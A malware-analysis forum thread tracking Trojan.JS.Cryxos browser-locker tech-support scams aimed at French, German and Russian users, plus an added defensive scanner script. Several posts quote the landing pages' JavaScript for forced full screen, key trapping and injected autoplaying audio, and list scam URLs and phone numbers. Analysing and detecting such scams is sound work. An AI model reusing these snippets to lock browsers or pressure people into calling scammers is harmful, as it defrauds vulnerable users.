Trojan.JS.Cryxos

Forum for analysis and discussion about malware.
User avatar
Xylitol
Global Moderator
Posts: 1666
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Trojan.JS.Cryxos

Post by Xylitol » Sat Jul 29, 2017 9:59 am

A fresh landing targeting France, as spotted by malekal (https://twitter.com/malekal_morte/statu ... 6680811521), asking for iTunes gift cards.
There is an anti-'noscript' that redirects people to a 404 page if JavaScript is disabled:

Code:

<noscript><meta http-equiv="refresh" content="0; URL=../google.com/index.html"></noscript>
Full screen:

Code:

//eval
if (key == 'jwsf72efuju2') {
  function toggleFullScreen() {
    // only request full screen when not already in it; tries the standard
    // API first, then the Mozilla and WebKit vendor-prefixed variants
    if (!document.fullscreenElement && !document.mozFullScreenElement && !document.webkitFullscreenElement) {
      if (document.documentElement.requestFullscreen) {
        document.documentElement.requestFullscreen();
      } else if (document.documentElement.mozRequestFullScreen) {
        document.documentElement.mozRequestFullScreen();
      } else if (document.documentElement.webkitRequestFullscreen) {
        document.documentElement.webkitRequestFullscreen(Element.ALLOW_KEYBOARD_INPUT);
      }
    }
  }
}
Full screen if escape key (VK_ESCAPE = 27) is pressed:

Code:

//eval
document.addEventListener('keyup', function(es) {
  if (es.keyCode == 27) {
    // Escape re-enters full screen and injects an autoplaying audio element
    toggleFullScreen();
    document.getElementById('sound').innerHTML = "<audio autoplay='autoplay'><source src='http://polariton.ad-l.ink/download/action/8bx2cmRy5/mp3'/></audio>";
  }
}, false);
More key events:
VK_F11 = 122
VK_CONTROL = 17
VK_ALT = 18
VK_RETURN = 13

Code:

//eval
document.addEventListener('keyup', function(e) {
  // F11, Ctrl, Alt and Enter get the same treatment as Escape
  if (e.keyCode == 122 || e.keyCode == 17 || e.keyCode == 18 || e.keyCode == 13) {
    toggleFullScreen();
    document.getElementById('sound').innerHTML = "<audio autoplay='autoplay'><source src='http://polariton.ad-l.ink/download/action/8bx2cmRy5/mp3'/></audio>";
  }
}, false);
[image attachment]

Code:

http://namemdk.review/fritunes1/
URL scan: https://www.virustotal.com/en/url/e5eba ... 501322170/ (3/65)
File scan: https://www.virustotal.com/en/file/185b ... 501319076/ (3/59)

Re: Trojan:HTML/Browlock.A

Post by Xylitol » Sat Aug 26, 2017 7:55 pm

Trojan.JS.Cryxos targeting France, trying to fool/scare the user into phoning 0186264266
https://www.f-secure.com/v-descs/trojan_js_cryxos.shtml
Continuing here because it is similar to my previous post, which is now also detected as Cryxos.

Code:

htxp://www.support.microsoft9023yfrmsrbcls6214.com.s3-website.eu-central-1.amazonaws.com/?cid={conversion}&pid={pubfeed}_{subid}&bid={bid}&ip={ip}&city={city}&network=yfrmsrbcls&cid=Iv1vt5Wy31M&pid=76535_68475&bid=0.006&ip=88.88.88.88&city=Gotham&network=yfrmsrbcls
[image attachment]
https://www.virustotal.com/en/file/3182 ... 503778932/

The page has poor French grammar and also audio speech.

Code:

htxp://www.support.microsoft9023yfrmsrbcls6214.com.s3-website.eu-central-1.amazonaws.com/assests/french.mp3

ID3 from file:
Artist: TextAloud: IVONA Mathieu22 (French)
Title: 19577024.mp3
Album: Created: 1/6/2017 8:43:22 AM
Year: 2017
Comment: http://www.nextup.com
Genre: Speech
It disables right click, attempts to go full screen, also blocks some keyCodes, displays alert() and 'locks' the browser by inserting an iframe that redirects to an HTTP auth prompt.

Code:

htxps://security-error-reported.in/2/chrome/auth.php
www-authenticate=Basic realm="Microsoft has detected suspicious activity from your IP address.Contact microsoft Engineers at 1-800-431-228(Toll Free Australia) or 0-800-069-8527( Toll Free UK) for Technical Assistance for network and secuirty support"
edit:
Some other hostile landings:

Code:

hxtp://www.support.microsoft9024yfrmsrbcls6214.com.s3-website.eu-central-1.amazonaws.com/
hxtps://we-mn-72.s3.amazonaws.com/gfhre/ts-ie-frgauth/index.htm?n=09-75-18-92-61&red=y&error=
[image attachment]

Re: Trojan:HTML/Browlock.A

Post by Xylitol » Sun Dec 10, 2017 1:38 am

Got one with sound, just a 3-second siren, triggered each time the user tries to interact with the landing (clicking on the page, pressing a key, etc.).

Code:

//eval
document.addEventListener('keyup', function(es) {
  if (es.keyCode == 27) {
    // Escape re-enters full screen and injects an autoplaying audio element
    toggleFullScreen();
    document.getElementById('sound').innerHTML = "<audio autoplay='autoplay'><source src='http://polariton.ad-l.ink/download/action/8bx2cmRy5/mp3'/></audio>";
  }
}, false);
And inline images with data urls:
[image attachment]

They seem to always use the same structure with a directory named 'fritunes' for french landings and 'deitunes' for german landings.
Some examples from urlquery:

German:
http://urlquery.net/report/f85e9577-985 ... a869dda4ec
http://urlquery.net/report/3b247b95-7ee ... 80a0074c33
http://urlquery.net/report/5872aefb-300 ... 27ed8d8def
https://urlquery.net/report/284b6de0-fe ... 0259f42b25
https://urlquery.net/report/9e057a27-63 ... b1aa589ff0

French:
https://urlquery.net/report/5fa93541-d1 ... 7e3a3441da
https://urlquery.net/report/193e42e3-08 ... 08c077affb
https://urlquery.net/report/e6fa93f6-98 ... 6322386515
http://urlquery.net/report/15ef1b49-957 ... acc06e3dab

Russian:
https://urlquery.net/report/bdf64aa5-32 ... 1def42cf0b
https://urlquery.net/report/89802663-e8 ... bc6b7e2417
https://urlquery.net/report/fb3a76a3-f5 ... 71534f5485

[image attachment]
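
The traits described across the three posts above (the meta refresh inside noscript, forced full screen re-entered on Escape/F11/Ctrl/Alt/Enter, injected autoplaying audio, disabled right click, alert() dialogs, images inlined as data: URLs, the hidden iframe to an auth.php that answers with a Basic-auth realm, and the 'fritunes'/'deitunes' directory naming) collected into a small static scanner for captured landing pages, plus a phone-number extractor for the realm and alert strings the operators use. This is an added example, not code from the thread or from the landing pages themselves. The regex list is my own heuristic, the sample page below is constructed for the example (the host example.invalid is a placeholder; the number in its alert is the Skype number quoted in the Dec 30 post), the realm string is the one quoted in the post above, the landing URL is the one from the Dec 30 post, and the 9-to-13-digit window for phone numbers is an assumption.

```javascript
'use strict';

// Static indicators, one per behaviour described in the posts above. Each
// regex is a heuristic of mine, tested against the raw page source.
const TRAITS = [
  { id: 'noscript_meta_refresh',
    re: /<noscript>\s*<meta[^>]+http-equiv=["']refresh["'][^>]*>\s*<\/noscript>/i,
    why: 'meta refresh inside <noscript>: users without JavaScript are bounced away' },
  { id: 'fullscreen_request',
    re: /\.(?:moz|webkit)?[Rr]equestFull[Ss]creen\s*\(/,
    why: 'page forces itself into full screen (incl. vendor-prefixed APIs)' },
  { id: 'fullscreen_on_escape',
    re: /keyCode\s*==\s*27\b/,
    why: 'Escape (VK_ESCAPE = 27) handled: re-enters full screen instead of leaving it' },
  { id: 'fullscreen_on_other_keys',
    re: /keyCode\s*==\s*(?:122|17|18|13)\b/,
    why: 'F11 / Ctrl / Alt / Enter handled the same way' },
  { id: 'audio_autoplay_injection',
    re: /innerHTML\s*=\s*["']<audio[^"']*autoplay/i,
    why: 'injects an autoplaying <audio> element (siren or speech)' },
  { id: 'contextmenu_blocked',
    re: /oncontextmenu\s*=|addEventListener\(\s*["']contextmenu["']/i,
    why: 'right click disabled' },
  { id: 'alert_dialog',
    re: /\balert\s*\(/,
    why: 'alert() dialogs to keep the tab busy' },
  { id: 'inline_data_image',
    re: /<img[^>]+src=["']data:image\//i,
    why: 'images inlined as data: URLs (nothing external to block)' },
  { id: 'iframe_to_http_auth',
    re: /<iframe[^>]+src=["'][^"']*auth\.php/i,
    why: 'iframe to an endpoint that answers 401 with a scary Basic realm' },
  { id: 'itunes_landing_path',
    re: /\/(?:fr|de)itunes\w*\//,
    why: "'fritunes' / 'deitunes' directory naming used by these landings" },
];

// Scan a page and return the matched traits, in TRAITS order.
function scanLanding(html) {
  return TRAITS.filter(t => t.re.test(html)).map(t => ({ id: t.id, why: t.why }));
}

// Pull phone numbers out of alert text, realm strings or query strings.
// Digits may be separated by spaces, dots, dashes or %20; the result is
// normalised to bare digits. Dotted-quad IPs are removed first because
// "188.166.26.60" would otherwise pass as a 10-digit number. The 9-13
// digit window is an assumption covering the FR/UK/AU numbers seen here.
function extractPhoneNumbers(text) {
  const cleaned = text
    .replace(/%20/g, ' ')
    .replace(/(?<![\d.])\d{1,3}(?:\.\d{1,3}){3}(?![\d.])/g, ' ');
  const found = new Set();
  for (const run of cleaned.match(/\+?\d(?:[\d .-]*\d)/g) || []) {
    const digits = run.replace(/\D/g, '');
    if (digits.length >= 9 && digits.length <= 13) found.add(digits);
  }
  return [...found];
}

// Realm text from a "WWW-Authenticate: Basic realm=..." header value,
// or null when the scheme is not Basic.
function basicRealm(headerValue) {
  const m = /Basic\s+realm\s*=\s*"([^"]*)"/i.exec(headerValue);
  return m ? m[1] : null;
}

// Constructed sample page for this example (not a real capture); the host
// example.invalid is a placeholder, the number is the one from the thread.
const SAMPLE_LANDING = `<html><head>
<base href="/fritunes1/">
<noscript><meta http-equiv="refresh" content="0; URL=../google.com/index.html"></noscript>
</head><body oncontextmenu="return false">
<img src="data:image/png;base64,iVBORw0KGgo=">
<div id="sound"></div>
<iframe src="https://example.invalid/2/chrome/auth.php" style="display:none"></iframe>
<script>
function toggleFullScreen() {
  if (!document.fullscreenElement) { document.documentElement.requestFullscreen(); }
}
document.addEventListener('keyup', function (e) {
  if (e.keyCode == 27 || e.keyCode == 122) {
    toggleFullScreen();
    document.getElementById('sound').innerHTML = "<audio autoplay='autoplay'><source src='siren.mp3'/></audio>";
  }
}, false);
setInterval(function () { alert('Appelez le 09 70 73 38 70'); }, 1000);
</script></body></html>`;

// The realm and the landing URL quoted in the thread.
const SAMPLE_REALM_HEADER = 'Basic realm="Microsoft has detected suspicious activity from your IP address.Contact microsoft Engineers at 1-800-431-228(Toll Free Australia) or 0-800-069-8527( Toll Free UK) for Technical Assistance for network and secuirty support"';
const SAMPLE_LANDING_URL = 'http://188.166.26.60/fr/?t=09%2070%2073%2038%2070&bk=673d079e';

for (const t of scanLanding(SAMPLE_LANDING)) console.log(t.id.padEnd(26), t.why);
console.log('numbers in page :', extractPhoneNumbers(SAMPLE_LANDING));
console.log('numbers in realm:', extractPhoneNumbers(basicRealm(SAMPLE_REALM_HEADER)));
console.log('numbers in URL  :', extractPhoneNumbers(SAMPLE_LANDING_URL));
```

Run over a batch of captures from urlquery or a proxy log and treat three or more traits as a browlock; a single hit (alert(), a fullscreen request) is common on benign pages and is not enough on its own. The IP-stripping step matters for the URL case: without it the landing host 188.166.26.60 would be reported as a 10-digit phone number.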

Re: Trojan.JS.Cryxos

Post by Xylitol » Sun Dec 10, 2017 10:42 am

[attachment only]


Re: Trojan.JS.Cryxos

Post by Xylitol » Sun Dec 24, 2017 12:54 am

[attachment only]


Re: Trojan.JS.Cryxos

Post by Xylitol » Wed Dec 27, 2017 1:19 pm

Code:

tds: http://erotiznet.com/THfQ4b
http://propelle.stream/fritunesexo/


Re: Trojan.JS.Cryxos

Post by Xylitol » Sat Dec 30, 2017 1:11 pm

[image attachment]

Code:

http://188.166.26.60/fr/?t=09%2070%2073%2038%2070&bk=673d079e
https://www.virustotal.com/en/file/6cf5 ... 514638450/
Full screen, hidden cursor, alert dialog, mp3 playing, inline images; wants you to call 09 70 73 38 70 (Skype number).

Re: Trojan.JS.Cryxos

Post by Xylitol » Fri Jan 05, 2018 2:43 pm

[image attachment]
redirector: game6666666.com - https://www.virustotal.com/en/url/93f0a ... 515166721/ (0/66)
cryxos: support.microsoft990207afrmscomborbclf8415.com.s3-website.eu-central-1.amazonaws.com - https://www.virustotal.com/en/url/23285 ... 515166632/ (0/66)
win-help-alert.site - https://www.virustotal.com/en/url/696cc ... 515166958/ (2/66)
https://www.virustotal.com/en/ip-addres ... formation/
skype number: 0970731054

[image attachment]


Also, erotiznet.com is still active.
[image attachment]
Redirecting to zakonvzakone.bid (5.8.18.5) https://www.virustotal.com/en/url/ff0b8 ... 515155349/ (1/66). You need a French IP and Firefox as the browser to get redirected to the usual fake French Police Nationale warning.

Talked with AWS (ec2-abuse[@]amazonaws.com); they finally took some initiative against Cryxos proliferation.
